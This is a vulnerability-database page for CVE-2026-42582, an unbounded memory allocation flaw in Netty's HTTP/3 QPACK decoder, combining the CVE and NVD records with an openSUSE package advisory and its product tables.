Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-42582 (GCVE-0-2026-42582)
Vulnerability from cvelistv5 – Published: 2026-05-13 18:06 – Updated: 2026-05-13 19:35
VLAI?
EPSS
Title
Netty: HTTP/3 QPACK literal unbounded allocation
Summary
Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length <= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.
Severity ?
7.5 (High)
CWE
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/netty/netty/security/advisorie… | x_refsource_CONFIRM |
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| netty | netty |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
|
|
| io.netty | netty-codec-http3 |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42582",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-13T19:35:22.097676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T19:35:35.549Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
}
]
},
{
"product": "netty-codec-http3",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-789",
"description": "CWE-789: Memory Allocation with Excessive Size Value",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T18:07:22.589Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw"
}
],
"source": {
"advisory": "GHSA-2c5c-chwr-9hqw",
"discovery": "UNKNOWN"
},
"title": "Netty: HTTP/3 QPACK literal unbounded allocation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42582",
"datePublished": "2026-05-13T18:06:55.559Z",
"dateReserved": "2026-04-28T17:26:12.085Z",
"dateUpdated": "2026-05-13T19:35:35.549Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42582",
"date": "2026-05-18",
"epss": "0.0004",
"percentile": "0.121"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42582\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-13T19:17:23.763\",\"lastModified\":\"2026-05-18T12:54:49.460\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"},{\"lang\":\"en\",\"value\":\"CWE-789\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.2.13\",\"matchCriteriaId\":\"A0A1D65F-15D0-4A34-BB56-A656847A8D5A\"}]}]}],\"references\":[{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42582\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-13T19:35:22.097676Z\"}}}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-13T19:35:31.046Z\"}}], \"cna\": {\"title\": \"Netty: HTTP/3 QPACK literal unbounded allocation\", \"source\": {\"advisory\": \"GHSA-2c5c-chwr-9hqw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"netty\", \"product\": \"netty\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}]}, {\"vendor\": \"io.netty\", \"product\": \"netty-codec-http3\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}]}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw\", \"name\": \"https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-789\", \"description\": \"CWE-789: Memory Allocation with Excessive Size Value\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-13T18:07:22.589Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-42582\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-13T19:35:35.549Z\", \"dateReserved\": \"2026-04-28T17:26:12.085Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-13T18:06:55.559Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-42582
Vulnerability from fkie_nvd - Published: 2026-05-13 19:17 - Updated: 2026-05-18 12:54
Severity ?
Summary
Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length <= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw | Exploit, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A0A1D65F-15D0-4A34-BB56-A656847A8D5A",
"versionEndExcluding": "4.2.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final."
}
],
"id": "CVE-2026-42582",
"lastModified": "2026-05-18T12:54:49.460",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-13T19:17:23.763",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-2c5c-chwr-9hqw"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
},
{
"lang": "en",
"value": "CWE-789"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
OPENSUSE-SU-2026:10795-1
Vulnerability from csaf_opensuse - Published: 2026-05-16 00:00 - Updated: 2026-05-16 00:00Summary
netty-4.1.133-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: netty-4.1.133-1.1 on GA media
Description of the patch: These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10795
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
6.5 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
8.2 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.6 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
